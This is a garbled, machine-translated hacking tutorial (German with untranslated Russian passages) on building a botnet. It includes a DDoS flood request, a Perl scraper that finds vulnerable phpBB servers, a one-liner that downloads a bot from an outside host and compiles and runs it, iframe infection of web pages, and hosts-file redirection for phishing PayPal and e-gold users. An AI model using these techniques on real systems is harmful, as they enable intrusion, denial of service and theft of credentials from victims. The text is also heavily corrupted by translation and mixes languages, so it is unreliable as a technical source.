2. Regelmäßige Aktualisierung des Betriebssystems, Webbrowsern und anderen Anwendungen, deren Entwickler viele Bars in ihrem Schutz erkennen und beseitigen, sowie Schwachstellen, die von Eindringlingen verwendet werden.

3. Das spezielle Verschlüsselungsprogramm schützt Ihre personenbezogenen Daten, auch wenn der Bot den Computer eingegeben hat, da der Zugriff auf sie zugreifen kann, muss das Passwort hacken.

4. Gesunder Menschenverstand und Vorsicht. Wenn Sie Ihre Daten aus einer anderen Art von Bedrohungen schützen möchten, sollten Sie keine Programme von unbekannten Ursprungs, Open-Archiven mit Dateien, die gegen Antivirus-Warnungen nicht herunterladen, herunterladen und installieren. Gehen Sie zu Websites, auf denen Browser als gefährlich usw.

Wir danken Kaspersky Lab für Hilfe bei der Herstellung des Materials

Schutzsysteme werden ständig verbessert, Programmierer werden erfahrener. Nun ist es weniger und weniger bekannte Fehler zulässig.

[Prolog]
Das Internet ist mit einer riesigen Kraft zerquetscht. Khakura wird schwerer, um nach Schwachstellen zu suchen. Admins werden verwendet, um die Entwicklung kühlster Sicherheit Ekssperts zu schützen. Kennen Sie Ihre Gedanken? In der Tat gibt es viele Schwachstellen im Internet, dies ist ein wenig Sinn von ihnen. Nun, es ist immer noch, wie Sie hier sehen können, stellen Sie sich die Situation vor, Sie haben eine Art Netzwerk-Bastard, Sie möchten es bestrafen. Heute sprechen wir über das Erstellen eines eigenen Kampfbotnetzes.
Also, was ist der "Bot". Die uneingeweide Person, die sofort im Gedächtnis, stürzt dumme Gegner in Computerspiele, die Sie in zwei Minuten schießen. Ja, es ist teilweise so. In unserem Fall ist der "Bot" ein Programm, das die darin eingebetteten Teams ausführt. Vrodi ist nichts Besonderes. Jemand willanfragen: "Ich sage, sie sagen, in fünf Jahren habe ich geschrieben, dass Sie auf die Schaltfläche klicken, und das Programm, Olya-la, schließt", um die Kindheit zu vergessen. Wir alle wissen, dass die Fähigkeiten der Kodierung endlos sind, und es ist möglich, es für das Gute und das Böse zu verwenden. Natürlich verwenden wir unsere Entwicklung immer mit guten Intimations. "Botnet" ist viele Bots von in einem Zentrum gesammelt, die die Befehle des Eigentümers synchron ausführen. Bots, übrigens, meist mehr auf Windows-Maschinen. Hier können Sie und Kennwörter unterstützt werden, und so SOX zum Put, und das Schraubformat, ich werde von den Regeln weggehen und mitzuteilen, wie ein Botnet von Nix-Autos erstellt wird. Die Hauptfunktion unseres Bots ist die Einschränkung von DDOs-Angriffen. Dies ist der perfekte Weg, um breite Kanäle von Nix-Servern zu verwenden. Anzahl. Der Server, den Sie "füllen", steht auf einem 100-MB-Kanal. Dh 10-20 Bots, die auf demselben Kanal stehen, werden den Server für einen Moment rollen. Wenn einer von einem Server mit einer Firewall bedeckt werden kann, dann von mehr Bots, Alas, keine Rettung

[Wir schreiben bot]
Auflistung des beispielhaften Bots finden Sie auf einem Link am Ende des Artikels. Wir werden ein bisschen mit dem Code verstehen. (Uh, träumen wieder alles wird über iRC kontrolliert? Durch web!). Übrigens wurde die Steuerung über IRC durch seine Interaktivität ausgewählt. Angenommen, ich möchte lokale Nuklear bearbeiten, indem Sie ein paar Server in einem Botnetz ausnutzen. Ich implementiere nur die SH UNAME -A-Team-Tools und findet sofort den Computer, den ich brauche. Dann führt er auch den Befehl im IRC-Client aus, lädt Bacdor und holen Sie sich interaktive Shell für weitere Maßnahmen. Eigenschaften sind unbegrenzt. Sie werden sagen - Sie können eine solche Kontrolle über das Web umsetzen, aber warum müssen Sie die Seite neu starten und den Verkehr verbringen? Gorryozda Es ist bequemer, alles in Echtzeit zu beobachten (zwar mit mehr 1000 Botneten, es kümmert sich um den Komfort der Schnittstelle. Webstound-Sensorat). Viele Menschen denken, dass die Einschränkung der DDOs sehr komplex ist. Hier ist ein Beispiel für den Code des üblichen Angriffs:

Holen /Server.org http / 1.0 \\ r \\ nConnection: Heep-Alive \\ r \\ nuser-agent: Mozilla / 4.75 (x11; u; Windows 5.2 I686) \\ r \\ nhost: server.org:80\\r\\naccept: Bild / GIF, Bild / XX-XBitmap, Image / JPEG, Image / PJPEG, Image / PNG, * / * \\ R \\ NACCECKE-Codierung: GZIP \\ R \\ NACCE-Sprache: EN \\ r \\ naccept-charset: ist 8859 -1, *, utf-8 \\ r \\ n \\ r \\ n

Dh dh wir senden einfach die Anforderung an den Server, wenn er sie antwortet, um sie zu beantworten. Senden Sie es außerdem, bis der Server nicht aus dem Mangel an Verkehrs- oder Prozessorzeit fällt. Aber sind Sie auf die allein-Nix-Bots beschränkt, Sie müssen beide Windows-Botneten erstellen, beispielsweise auf AGOBOT. Dazu können Sie einen bestimmten Code für den Bot erstellen, der den Betreff der LSASL / DCOM-Schwachstellen der Maschine scannt, die an den Server angeschlossen ist, auf dem der Bot installiert ist.

[Erstellen Sie ein Botnet]
Tatsächlich erstellen Botnet ist sehr einfach. Dazu müssen wir in jedem Webskript eine Sicherheitsanfälligkeit finden. Die gefundene Sicherheitsanfälligkeit sollte den Befehlen interpritierender Shell-Befehle ermöglichen, um auszuführen. Wenn Sie eine Sicherheitsanfälligkeit finden, achten Sie auf den Namen der Bag-Datei, ihren Titel, den Namen des anfällbaren Systems. Mit Hilfe dieser Daten müssen Sie nun eine gute Suchabfrage erstellen. Zum Beispiel das Einfügen der bekannten Anfälligkeit in phpbb<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Socke \u003d IO :: Socket :: INET-\u003e NEU (Peeraddr \u003d\u003e "Suchen.aol.com", Peerport \u003d\u003e "80", P RO \u003d\u003e "TCP") oder als nächstes; Drucken $ Socke "GET / OOOLCOM / SUCHE? Q \u003d Viewtopic.php% 3FT% 3D7 & STAGE \u003d 0 & Page \u003d $ n http / 1.0 \\ n \\ n"; @resu \u003d.<$sock>; Close ($ Socke);

Wget http://server.org/bot.clpcc bot.c -o bash; chmod + x bash; ./ bash;

Hier sehen Sie zwei Probleme gleichzeitig. Wget und gcc sind möglicherweise nicht oder ihre Verwendung wird verboten. Hier helfen die Schaukelstühle Fech, Curl und Get oder Console-Browser Lynx oder verwenden das FTP-Protokoll. Seine Realisierung ist komplizierter, aber auch das FTP ist, dass es überall in Bezug auf den Compiler gibt, Sie können das Binärer einfach auf meiner Shell kompilieren und hoffen, dass alles mit der Kompatibilität in Ordnung sein wird, oder den Bot an unterdrückte Sprachen umschreiben - perl oder PHP. Jede Methode hat seine Vorteile und Nachteile, was Sie zur Verwendung Ihrer Wahl verwenden. Ich habe den erfassten Server auf das Maximum verwendet. Schließlich dauert der Bot auf dem Nix-Server nur bis zum ersten Neustart der Maschine. Aus dieser Situation gibt es eine interessante Leistung. Der Bot wird nach interpretierbaren Dateien (.PL, XPH) in der Eintragung zur Verfügung gesucht und dem Downloadcode hinzugefügt und den Bot-Bot begonnen. Oder Sie können ein anderes Windbotnetz erstellen. Es ist auch leicht umgesetzt. Hier benötigen Sie eine Sicherheitsanfälligkeit in Internet Explorer, Opera, Mozilla, die zum Sprung führt und die gewünschte Datei ausführen. Als nächstes wird der Inframe-Aufnahme erstellt, um unseren schädlichen Code herunterzuladen. Dieser Eintrag wird allen Indexdateien hinzugefügt (oder in allen, wo ein HTML-Code vorhanden ist, der alles von Ihrer Arroganz abhängt). Mit solcher Arbeit bewältigt ein kleines Skript perfekt mit den HAZ, die Sie auch im Archiv finden werden. Die Buglosigkeit ist mit Aufzeichnungen kritischer Schwachstellen in Internet Explorer gefüllt, so dass in unserer Unterordnung auf Windows-Systemen (seine oben genannten Vorteile) sein wird). Alles, starten Sie unseren Suchwurm auf dem Hochgeschwindigkeits-Sklaven, trinken Sie Kaffee (Bier, Wodka, Tomatensaft) auf den IRC-Kanal, der in den Eigenschaften des Bots angegeben ist, und beobachten Sie die Anzahl Ihrer Untergebenen. Zusammenfassend möchte ich jedem, der mich kennt, Hallo vermitteln und Ihnen viel Glück wünschen. Komm nicht.
Xxxxhhhhhhhhhhhhhhhhhh xxx.

Die Sicherheitsanfälligkeit in PHPBB ist bis 2.0.16 relevant, obwohl die Entwickler behaupten, dass sie mit 2.0.11 korrigiert wurden

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org.

Phishing
Es ist sehr praktisch, Bots als Organisation von Phishing zu verwenden. Dazu benötigen wir spezielle Seiten, die unter der Phishing-Seite geschärft werden, die die Website, die wir benötigen, und ein gutes Hosting, dedizierter Server oder VDS. Solche Seiten können selbst erledigt werden, um online zu suchen. Die Wahl ist riesig. Meistens ist Phishing auf Standorten organisiert: e-gold.com, payPal.com, citybank.com, usbank.com, eBay.c Om und andere, sowieso, im Zusammenhang mit dem elektronischen Handel. Als Nächstes schreibt Windows Bot die \\ system32 \\ dreiber \\ etc \\ hosts files filt die IP-Adresse Ihres Servers und die Zuweisung der Website, die Sie benötigen. Dateiformat ist wie folgt:

102.54.94.97 E-GOLD.COM 102.54.94.97 PayPal.com

IE, Scores in den Browser-Sites e-gold.com und PayPal.com Der Benutzer steigt auf unseren Server ist nichts Gutes. Wiederum werden Datensätze über die entsprechenden Domains dem Fisher-Server in httpd.conf hinzugefügt.

Documentroot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias \u200b\u200b"e-gold.com" "www.e-gold.com"

Es wird in der Linie des Browsers verstanden, ist alle vertrauten Adresse e-gold.com und sogar ein fortgeschrittener Benutzer an der Website angemeldet ist nichts Suspension. Für die Vollständigkeit des Bildes werde ich sagen, dass, wenn der Benutzer einen Proxy-Server verwendet, diese Weise nicht funktioniert

Bots für jeden Geschmack
Agobot / Phatbot / ForBot / Xtrembot
Dies ist die beste Flaschenfamilie. Geschrieben auf c ++. Es gibt viele Erkennungsschutzfunktionen und haben mehr als 500 Modifikationen aufgrund einer deutlich ausgeprägten modularen Struktur.
Sdbot / rbot / urbot / urxbot
Sehr beliebt am Tag der Bots für DDOs-Angriffe. Haben viele zusätzliche Funktionen. B. die Eröffnung von Sock4, Keylogger, automatischer LSASS-Scanner und DCOM-Sicherheitsleichheiten. Hat auch eine Funktion der Umleitung von Anforderungen an die Websites von Antivirensunternehmen an einen lokalen Server, indem Sie \\ System32 \\ Treiber \\ etc \\ etc \\ hosts \\ system32 \\ drivers \\ etc \\ \\ \\ \\ \\ hosts und installieren eines kleinen gefälschten Webservers auf 80 Port.
DSNX-Bots.
Dieser Bot kann DDOs-Angriffe, Scannen von Ports und einige kleine Dinge durchführen.
Q8 Bots.
Ausgezeichneter Bot unter dem Nix-System. Es hat seinen kompakten Code (27 KB, besteht aus einer Datei) und keine schlechte Funktionalität. Es kann dynamisch aktualisiert werden, indem Sie eine neue Datei herunterladen und ausführen. Nun, implementiert die grundlegende Implementierung von DDOs (Syn-Flut, UDP-Flut). In der Lage, Systemteams auszuführen. Im System auch ziemlich gut maskiert.
kaiten.
Auch ein guter Bot unter dem UNIX / Linux-System. In der Lage, eine Remote-Shell auf dem Sequenzserver zu öffnen.
Perl-basierte Bots
Dies sind sehr kleine Bots auf Perl. Wird für DDOs-Angriffe auf Unix-basierten Systemen verwendet.

---
Der Artikel hat eine große Vorspannung in Richtung des Hackings, daher ist es unverständlich - fragen.